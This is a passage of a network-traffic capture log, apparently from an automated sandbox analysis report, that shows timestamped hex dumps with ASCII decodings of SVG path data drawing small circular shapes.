                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC9097INData Raw: 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 32 36 2e 38 36 2c 32 33 33 2e 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c
                                                                                                                                                                                                                                                                          Data Ascii: ,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M326.86,233.8a2.17,2.17,0,0,1-1,2.82,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9209INData Raw: 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 34 2e 36 32 2c 32 39 34 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61
                                                                                                                                                                                                                                                                          Data Ascii: 18,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M364.62,294a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"/><path cla
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9225INData Raw: 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 32 39 30 2e 36 34 2c 32 30 32 2e 33 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 32 39 30 2e 33 37 2c 31 39 34 2e 32 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: ass="cls-9" d="M290.64,202.37a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M290.37,194.29a2,2,0,0,1-.91,2.61,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9241INData Raw: 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 32 34 2e 38 33 2c 32 34 31 2e 36 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 32 34 2e 35 36 2c 32 33 33
                                                                                                                                                                                                                                                                          Data Ascii: 8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M324.83,241.65a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.88-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M324.56,233
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9257INData Raw: 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 35 39 2e 33 2c 32 38 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2e 30 35 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 35 39 2c 32 38 30 2e 39 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d
                                                                                                                                                                                                                                                                          Data Ascii: 38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M359.3,289a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.62,2.62,0,0,1,3.37.05,2.45,2.45,0,0,1,.18,3.32"/><path class="cls-9" d="M359,280.92a2,2,0,0,1-.91,2.61,2.93,2.93,0,0,1-
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9273INData Raw: 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 39 33 2e 34 39 2c 33 32 38 2e 32 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c
                                                                                                                                                                                                                                                                          Data Ascii: 1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M393.49,328.28a2,2,0,0,1-.9,2.6,2.92,2.92,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9289INData Raw: 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 38 2c 33 37 35 2e 36 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 37 2e 36 39 2c 33 36 37 2e 35 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33
                                                                                                                                                                                                                                                                          Data Ascii: ><path class="cls-9" d="M428,375.63a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"/><path class="cls-9" d="M427.69,367.56a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.3
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9305INData Raw: 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 34 36 2e 32 39 2c 31 38 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d
                                                                                                                                                                                                                                                                          Data Ascii: 3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M446.29,189a2,2,0,0,1-.9,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d=
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9321INData Raw: 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 30 2e 34 39 2c 32 32 38 2e 32 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                                          Data Ascii: ,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.47,2.47,0,0,1,.19,3.33"/><path class="cls-9" d="M480.49,228.29a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.46,2.46,0,0,1
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9337INData Raw: 2d 39 22 20 64 3d 22 4d 35 31 35 2c 32 37 35 2e 36 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 34 2e 36 38 2c 32 36 37 2e 35 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: -9" d="M515,275.65a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M514.68,267.57a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9353INData Raw: 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2e 30 35 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 39 2e 31 35 2c 33 31 34 2e 39 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 38 2e 38 38 2c 33 30 36 2e
                                                                                                                                                                                                                                                                          Data Ascii: 0,0,1,.59-3.37,2.63,2.63,0,0,1,3.38.05,2.46,2.46,0,0,1,.18,3.32"/><path class="cls-9" d="M549.15,314.92a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.47,2.47,0,0,1,.18,3.33"/><path class="cls-9" d="M548.88,306.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9369INData Raw: 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 33 2e 36 32 2c 33 36 32 2e 32 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 33 2e 33 34 2c 33 35 34 2e 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34
                                                                                                                                                                                                                                                                          Data Ascii: ss="cls-9" d="M583.62,362.28a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M583.34,354.2a2,2,0,0,1-.91,2.6,2.91,2.91,0,0,1-3.88-1.09,2.81,2.81,0,0,1,.59-3.37,2.64
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9385INData Raw: 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 33 2c 32 34 2e 37 38 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 41 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 33 32 39 2e 31 2c 32 36 61 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 32 2e 37 33 2c 31 38 2e 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: ,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M333,24.78a1.61,1.61,0,0,1-.73,2.09A2.34,2.34,0,0,1,329.1,26a2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M332.73,18.3a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9401INData Raw: 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 30 2e 33 39 2c 35 36 2e 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 30 2e 31 37 2c 34 39 2e 38 32 61 31 2e 36 31 2c
                                                                                                                                                                                                                                                                          Data Ascii: .24,0,0,1,.47-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M360.39,56.3a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M360.17,49.82a1.61,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9417INData Raw: 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 38 37 2e 38 33 2c 38 37 2e 38 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 41 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 33 38 34 2c 38 39 61 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 38 22 2f 3e 3c 70 61 74
                                                                                                                                                                                                                                                                          Data Ascii: 3,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M387.83,87.82a1.61,1.61,0,0,1-.73,2.09A2.34,2.34,0,0,1,384,89a2.25,2.25,0,0,1,.47-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.68"/><pat
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9433INData Raw: 35 2e 38 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 41 32 2c 32 2c 30 2c 30 2c 31 2c 34 31 35 2c 31 32 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 31 35 2e 32 37 2c 31 31 39 2e 33 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: 5.82a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0A2,2,0,0,1,415,127"/><path class="cls-9" d="M415.27,119.34a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.7,0,2,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9449INData Raw: 34 34 32 2e 39 33 2c 31 35 37 2e 33 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 34 32 2e 37 31 2c 31 35 30 2e 38 36 41 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2c 34 34 32 2c 31 35 33 61 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c
